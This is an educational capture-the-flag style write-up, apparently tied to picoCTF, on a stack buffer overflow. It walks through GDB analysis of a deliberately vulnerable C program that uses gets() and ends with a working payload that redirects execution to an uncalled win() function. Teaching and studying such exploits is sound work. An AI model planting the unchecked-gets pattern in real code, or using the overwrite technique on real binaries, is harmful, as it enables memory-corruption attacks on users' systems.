By abusing the leniency of some C functions when it comes to filling buffers with user-provided information, we can reach other restricted parts of the program, or even execute arbitrary code.
In this demonstration, we will see how a buffer on the stack is filled by the gets function, and how overflowing it allows us to execute a function that the program would otherwise never call.
All the addresses used in the snippets and explanations are specific to the setup used to build this write-up. You will need to adapt them to your use-case in order to replicate the behaviour of this exploit.
Some useful GDB commands for the exercise:
(gdb) r
Run the program
(gdb) c
Continue the execution
(gdb) si
Step instruction
(gdb) b <func>
Place a breakpoint at <func>
(gdb) b *0x000000000040118b
Place a breakpoint at the given memory address
(gdb) i b
List breakpoints info
(gdb) d 1 2
Delete breakpoints 1 and 2
(gdb) d
Delete all breakpoints
(gdb) disas /r
Show the disassembly of the current function. /r adds the raw instruction bytes from the program memory, in hex form.
(gdb) x $rsp
Show the content of the memory at the address held in register $rsp. The result shows that address and the content stored there, such as 0x7fffffffd460: 0xffffd480.
(gdb) x/16xw $rsp
Show the content of the memory starting at the address held in $rsp, for 16 words, in hex form.
(gdb) x/32xw 0x401160
Show the content of the memory starting at address 0x401160, for 32 words, in hex form.
We will be working with this vulnerable snippet of code:
#include <stdio.h>
#define BUFSIZE 4
void win()
{
puts("If I am printed, I was hacked! because the program never called me!");
}
void vuln()
{
puts("Input a string and it will be printed back!");
char buf[BUFSIZE];
gets(buf);
puts(buf);
fflush(stdout);
}
int main(int argc, char **argv)
{
vuln();
return 0;
}
The problem lies in gets, which neither restricts nor checks the amount of data entered by the user. A safer alternative would be fgets, which takes the size of the buffer as an argument.
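To compile it, use this gcc command: gcc vuln1.c -o vuln1 -fno-stack-protector -no-pie
-fno-stack-protector disables the stack canary that would otherwise detect the overflow, and -no-pie keeps the code at fixed addresses, so that function addresses stay the same from one run to the next.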
The aim is to make it print the winning string, which is inside a function that is never called.
gets simply writes everything it reads into its buffer. If we send too much information, that buffer will overflow and overwrite other information on the stack. Our goal is to overwrite a specific part of the stack with a chosen address, so that the program jumps to the otherwise unreachable function.
Using GDB, we can analyse how the program works and jump from one function to the other.
Run the program using GDB for the first time:
$ gdb ./vuln1
GNU gdb (GDB) 12.1
Copyright (C) 2022 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
[...]
Reading symbols from ./vuln1...
(No debugging symbols found in ./vuln1)
(gdb) r
Starting program: /home/dlh/dev/exploits/pico-CTF/primer-stack-overflow/vuln1
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/usr/lib/libthread_db.so.1".
Input a string and it will be printed back!
hi:)
hi:)
[Inferior 1 (process 9621) exited normally]
(gdb)
Let us start by setting a breakpoint in the main function and dumping the code:
(gdb) b main
Breakpoint 1 at 0x4011a6
(gdb) r
Starting program: /home/dlh/dev/exploits/pico-CTF/primer-stack-overflow/vuln1
Breakpoint 1, 0x00000000004011a6 in main ()
(gdb) disas /r
Dump of assembler code for function main:
0x00000000004011a2 <+0>: 55 push %rbp
0x00000000004011a3 <+1>: 48 89 e5 mov %rsp,%rbp
=> 0x00000000004011a6 <+4>: 48 83 ec 10 sub $0x10,%rsp
0x00000000004011aa <+8>: 89 7d fc mov %edi,-0x4(%rbp)
0x00000000004011ad <+11>: 48 89 75 f0 mov %rsi,-0x10(%rbp)
0x00000000004011b1 <+15>: b8 00 00 00 00 mov $0x0,%eax
0x00000000004011b6 <+20>: e8 a1 ff ff ff call 0x40115c <vuln>
0x00000000004011bb <+25>: b8 00 00 00 00 mov $0x0,%eax
0x00000000004011c0 <+30>: c9 leave
0x00000000004011c1 <+31>: c3 ret
End of assembler dump.
The structure of the disassembly dump is:
address <offset_from_function_start>: program_memory_content assembly_instructions
The call to the vuln function happens at address 0x4011b6 and makes the program jump to 0x40115c. In order to come back into the main function when vuln ends, the program needs to store somewhere the address of the next instruction (0x4011bb), which is the value the IP (instruction pointer) must take again after the return.
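Both addresses can be recomputed from the raw bytes of the call instruction shown by disas /r. The following is a minimal sketch, assuming the bytes e8 a1 ff ff ff from the dump above; the variable names are only illustrative.

```python
import struct

# Address and raw bytes of the call instruction, copied from the main dump.
CALL_ADDR = 0x4011b6
CALL_BYTES = bytes.fromhex("e8a1ffffff")

# 0xe8 is the opcode of a near relative call. The next 4 bytes are a signed
# little-endian displacement, relative to the address of the next instruction.
opcode = CALL_BYTES[0]
(displacement,) = struct.unpack("<i", CALL_BYTES[1:5])

return_address = CALL_ADDR + len(CALL_BYTES)  # instruction right after the call
call_target = return_address + displacement   # where execution jumps to

print(hex(return_address))  # 0x4011bb
print(hex(call_target))     # 0x40115c
```

The return address is simply the address of the call plus its length (5 bytes), and it is this value that the CPU saves before jumping.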
Let's check the content of the IP at this point:
(gdb) x $rip
0x4011a6 <main+4>: 0x10ec8348
We get the address of the instruction about to be executed and the content of the memory at that address. Note that GDB displays this content as a 32-bit little-endian word, so the bytes appear in reverse order compared to the way they are stored in memory (48 83 ec 10 in the disassembly above).
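To make the byte order concrete, here is a small sketch that converts the bytes shown by disas /r for main+4 into the word printed by x $rip, and back. It only uses the values from the dumps above.

```python
import struct

# Bytes at 0x4011a6 in memory order, as printed by `disas /r`.
raw = bytes.fromhex("4883ec10")

# Interpret them as one 32-bit little-endian word: the first byte in memory
# is the least significant one, so it ends up on the right when printed.
(word,) = struct.unpack("<I", raw)
print(hex(word))  # 0x10ec8348

# Packing the word again gives back the original memory layout.
print(struct.pack("<I", word).hex(" "))  # 48 83 ec 10
```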
Let's progress up to the vuln function call and then step into it:
(gdb) b *0x00000000004011b6
Breakpoint 2 at 0x4011b6
(gdb) c
Continuing.
Breakpoint 2, 0x00000000004011b6 in main ()
(gdb) si
0x000000000040115c in vuln ()
(gdb) disas /r
Dump of assembler code for function vuln:
=> 0x000000000040115c <+0>: 55 push %rbp
0x000000000040115d <+1>: 48 89 e5 mov %rsp,%rbp
0x0000000000401160 <+4>: 48 83 ec 10 sub $0x10,%rsp
0x0000000000401164 <+8>: 48 8d 05 e5 0e 00 00 lea 0xee5(%rip),%rax # 0x402050
0x000000000040116b <+15>: 48 89 c7 mov %rax,%rdi
0x000000000040116e <+18>: e8 bd fe ff ff call 0x401030 <puts@plt>
0x0000000000401173 <+23>: 48 8d 45 fc lea -0x4(%rbp),%rax
0x0000000000401177 <+27>: 48 89 c7 mov %rax,%rdi
0x000000000040117a <+30>: b8 00 00 00 00 mov $0x0,%eax
0x000000000040117f <+35>: e8 bc fe ff ff call 0x401040 <gets@plt>
0x0000000000401184 <+40>: 48 8d 45 fc lea -0x4(%rbp),%rax
0x0000000000401188 <+44>: 48 89 c7 mov %rax,%rdi
0x000000000040118b <+47>: e8 a0 fe ff ff call 0x401030 <puts@plt>
0x0000000000401190 <+52>: 48 8b 05 91 2e 00 00 mov 0x2e91(%rip),%rax # 0x404028 <stdout@GLIBC_2.2.5>
0x0000000000401197 <+59>: 48 89 c7 mov %rax,%rdi
0x000000000040119a <+62>: e8 b1 fe ff ff call 0x401050 <fflush@plt>
0x000000000040119f <+67>: 90 nop
0x00000000004011a0 <+68>: c9 leave
0x00000000004011a1 <+69>: c3 ret
End of assembler dump.
We are now inside the vuln function. The return address has been pushed onto the stack, at the address held in the Stack Pointer register $rsp (SP):
(gdb) x $rsp
0x7fffffffd468: 0x004011bb
0x004011bb indeed corresponds to the instruction right after the call to vuln in the main function.
The SP points to the top of the stack, which grows down from higher addresses to lower addresses. When the program needs to make space on its stack to store some variable (such as our 4-byte buffer), the SP is moved down to a lower address.
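The movement of the SP through the prologue of vuln can be followed step by step. This is a rough model, assuming that $rsp was 0x7fffffffd470 in main just before the call (8 bytes above the value printed by x $rsp on entry to vuln); the instructions in the comments come from the vuln disassembly.

```python
# Assumed value of $rsp in main right before `call vuln` (this session only).
rsp = 0x7fffffffd470

rsp -= 8               # call: push the 8-byte return address
return_slot = rsp

rsp -= 8               # push %rbp: save the caller's frame pointer
saved_rbp_slot = rsp

rbp = rsp              # mov %rsp,%rbp: start of vuln's stack frame

rsp -= 0x10            # sub $0x10,%rsp: reserve 16 bytes for locals

buf = rbp - 0x4        # lea -0x4(%rbp),%rax: address passed to gets

for name, value in [("return_slot", return_slot), ("saved_rbp_slot", saved_rbp_slot),
                    ("rsp", rsp), ("buf", buf)]:
    print(f"{name:15} {value:#x}")
```

Every step subtracts from the SP, which is what "growing down" means in practice. The buffer ends up below the saved frame pointer and the return address, so writing past its end moves towards them.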
Let's move the execution right before the gets call:
(gdb) b *0x000000000040117f
Breakpoint 3 at 0x40117f
(gdb) c
Continuing.
Input a string and it will be printed back!
Breakpoint 3, 0x000000000040117f in vuln ()
If we print a chunk of the program stack starting from the current position of the SP:
(gdb) x/8xw $rsp
0x7fffffffd450: 0x00000000 0x00000000 0x00000000 0x00000000
0x7fffffffd460: 0xffffd480 0x00007fff 0x004011bb 0x00000000
We can spot the return address 0x004011bb that was pushed earlier; the SP was then decremented to make some space for our buffer.
We can also see the address 0x00007fffffffd480: it is the value of $rbp saved by the push %rbp at the start of vuln, which main needs in order to get its own stack frame back.
Let's advance to trigger the input prompt, write ABC, then check the stack again:
(gdb) b *0x0000000000401184
Breakpoint 4 at 0x401184
(gdb) c
Continuing.
ABC
Breakpoint 4, 0x0000000000401184 in vuln ()
(gdb) x/8xw $rsp
0x7fffffffd450: 0x00000000 0x00000000 0x00000000 0x00434241
0x7fffffffd460: 0xffffd480 0x00007fff 0x004011bb 0x00000000
The hex codes of ABC are 0x41 0x42 0x43, followed by a terminating null character 0x00 that also has to be stored (remember that GDB displays each word with its bytes in reverse order compared to memory).
Now if we restart everything and input an entry that is too large for the buffer, we will overwrite important information on the stack and trigger a segmentation fault:
(gdb) r
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/dlh/dev/exploits/pico-CTF/primer-stack-overflow/vuln1
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/usr/lib/libthread_db.so.1".
Breakpoint 1, 0x00000000004011a6 in main ()
(gdb) c
Continuing.
Breakpoint 2, 0x00000000004011b6 in main ()
(gdb) c
Continuing.
Input a string and it will be printed back!
Breakpoint 3, 0x000000000040117f in vuln ()
(gdb) c
Continuing.
ABCDE
Breakpoint 4, 0x0000000000401184 in vuln ()
(gdb) x/8xw $rsp
0x7fffffffd450: 0x00000000 0x00000000 0x00000000 0x44434241
0x7fffffffd460: 0xffff0045 0x00007fff 0x004011bb 0x00000000
(gdb) c
Continuing.
ABCDE
Program received signal SIGSEGV, Segmentation fault.
0x0000000000000000 in ?? ()
gets started by filling the area allocated to our buffer, which begins at address 0x7fffffffd45c (the last word of the first row, at -0x4(%rbp)), with 0x41 for the letter A, then wrote 0x42 for the letter B at address 0x7fffffffd45d, and so on.
The letter E (0x45) and the terminating character (0x00) must still be stored, and the program simply keeps moving up the stack to write those bytes, overwriting the two low-order bytes of the address 0x7fffffffd480 and changing it into 0x7fffffff0045.
So the next time the program reads that address and tries to access its content, there is a good chance it will be outside our process address space, triggering a segmentation fault (SIGSEGV).
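The two dumps can be reproduced with a small model of the stack. The sketch below assumes the eight words printed by x/8xw $rsp before gets runs, and a buffer located at -0x4(%rbp), that is 0x7fffffffd45c in this session; simulate_gets is a hypothetical helper that only mimics the unchecked copy, not the real function.

```python
import struct

STACK_BASE = 0x7fffffffd450  # $rsp inside vuln, from the x/8xw dumps
BUF_ADDR = 0x7fffffffd45c    # -0x4(%rbp), with %rbp = 0x7fffffffd460

# The eight 32-bit words shown by `x/8xw $rsp` before gets is called.
INITIAL_WORDS = [0, 0, 0, 0, 0xffffd480, 0x00007fff, 0x004011bb, 0]


def simulate_gets(text):
    """Copy text plus a terminating NUL into the model, with no bounds check."""
    stack = bytearray(struct.pack("<8I", *INITIAL_WORDS))
    start = BUF_ADDR - STACK_BASE
    data = text + b"\x00"
    stack[start:start + len(data)] = data
    return list(struct.unpack("<8I", stack))


for text in (b"ABC", b"ABCDE"):
    words = simulate_gets(text)
    print(text.decode(), " ".join(f"0x{w:08x}" for w in words))
```

With ABC, only the fourth word changes. With ABCDE, the two extra bytes land in the fifth word, which holds the low half of the saved frame pointer, while the return address is still intact.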
As we can overwrite the content of the stack, we could build an input (a payload) large enough to reach the targeted 0x004011bb and change it into the address of the function win, so that when the vuln function returns, instead of executing the instruction at 0x004011bb in main, we actually jump to the beginning of win.
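How many bytes must be written before reaching the return address can be worked out from the disassembly alone, without relying on absolute stack addresses. A minimal sketch, assuming the frame layout produced by this particular build (other compilers or flags may lay the frame out differently):

```python
# Offsets relative to %rbp inside vuln, read from its disassembly.
BUF_OFFSET = -0x4          # lea -0x4(%rbp),%rax before the call to gets
SAVED_RBP_OFFSET = 0x0     # push %rbp; mov %rsp,%rbp leaves the saved value at (%rbp)
RETURN_ADDR_OFFSET = 0x8   # slot pushed by call, just above the saved %rbp

buffer_bytes = SAVED_RBP_OFFSET - BUF_OFFSET             # bytes that belong to buf
saved_rbp_bytes = RETURN_ADDR_OFFSET - SAVED_RBP_OFFSET  # bytes of the saved frame pointer
padding = buffer_bytes + saved_rbp_bytes                 # filler before the return address

print(buffer_bytes, saved_rbp_bytes, padding)  # 4 8 12
```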
Using $ objdump -d ./vuln1 in a terminal, we can see that win starts at address 0x401146.
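Looking the address up by hand gets tedious when the binary is rebuilt often. As a sketch, the function headers of the objdump -d output can be parsed with a regular expression; symbol_addresses is a hypothetical helper, and SAMPLE is a trimmed excerpt written for illustration using the addresses from this write-up, not the full real output.

```python
import re

# Function headers printed by `objdump -d` look like "0000000000401146 <win>:".
SYMBOL_HEADER = re.compile(r"^([0-9a-f]+) <([^>]+)>:$")


def symbol_addresses(objdump_text):
    """Map each function name found in the disassembly to its start address."""
    addresses = {}
    for line in objdump_text.splitlines():
        match = SYMBOL_HEADER.match(line.strip())
        if match:
            addresses[match.group(2)] = int(match.group(1), 16)
    return addresses


# Trimmed, illustrative excerpt (assumption: real output has many more lines).
SAMPLE = """\
0000000000401146 <win>:
  401146: 55                    push   %rbp
000000000040115c <vuln>:
  40115c: 55                    push   %rbp
00000000004011a2 <main>:
  4011a2: 55                    push   %rbp
"""

print(hex(symbol_addresses(SAMPLE)["win"]))  # 0x401146
```

On a real binary, the text could come from subprocess.run(["objdump", "-d", "./vuln1"], capture_output=True, text=True).stdout.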
Using Python, we can send a payload whose bytes are written as hexadecimal escapes, as such:
$ python -c 'print(12*"A"+"\x46\x11\x40\x00")' | ./vuln1
Input a string and it will be printed back!
AAAAAAAAAAAAF@
If I am printed, I was hacked! because the program never called me!
zsh: done python -c 'print(12*"A"+"\x46\x11\x40\x00")' |
zsh: segmentation fault (core dumped) ./vuln1
We print an arbitrary character A 12 times: 4 times to fill the buffer, then 8 times to cover both 0xffffd480 and 0x00007fff. We then append our address 0x00401146 in reverse byte order to overwrite the existing 0x004011bb.
In the end we still get a segmentation fault due to the garbage we wrote on the stack, but we did manage to reach the win function in the process.
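The same payload can be built in a short script, which is easier to adapt than a one-liner when the padding or the target address changes. This is a sketch under the assumptions of this write-up (12 bytes of padding, win at 0x401146); build_payload is a hypothetical helper. Unlike the one-liner, it writes all 8 bytes of the return address slot instead of relying on the upper four already being zero.

```python
import struct
import sys

PADDING = 12         # 4 bytes of buf + 8 bytes of saved %rbp (this build only)
WIN_ADDR = 0x401146  # address of win reported by objdump (this build only)


def build_payload(padding, target):
    """Filler up to the return address, then the target as a 64-bit little-endian value."""
    # The trailing newline tells gets where the input ends.
    return b"A" * padding + struct.pack("<Q", target) + b"\n"


payload = build_payload(PADDING, WIN_ADDR)

if __name__ == "__main__":
    # Write raw bytes: print() would encode the text and could alter bytes >= 0x80.
    sys.stdout.buffer.write(payload)
```

Saved under a name of your choice, for example payload.py, it would be used as python3 payload.py | ./vuln1.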
- https://ccrma.stanford.edu/~jos/stkintro/Useful_commands_gdb.html
- https://primer.picoctf.org/#_binary_exploitation
- https://inst.eecs.berkeley.edu/~cs161/fa08/papers/stack_smashing.pdf
- https://repository.root-me.org/Exploitation%20-%20Syst%C3%A8me/Unix/FR%20-%20Stack%20Bug%20-%20Exploitation%20avancee%20de%20buffer%20overflow.pdf
- https://repository.root-me.org/Exploitation%20-%20Syst%C3%A8me/Unix/EN%20-%2064%20Bits%20Linux%20Stack%20Based%20Buffer%20Overflow.pdf (execution of arbitrary code)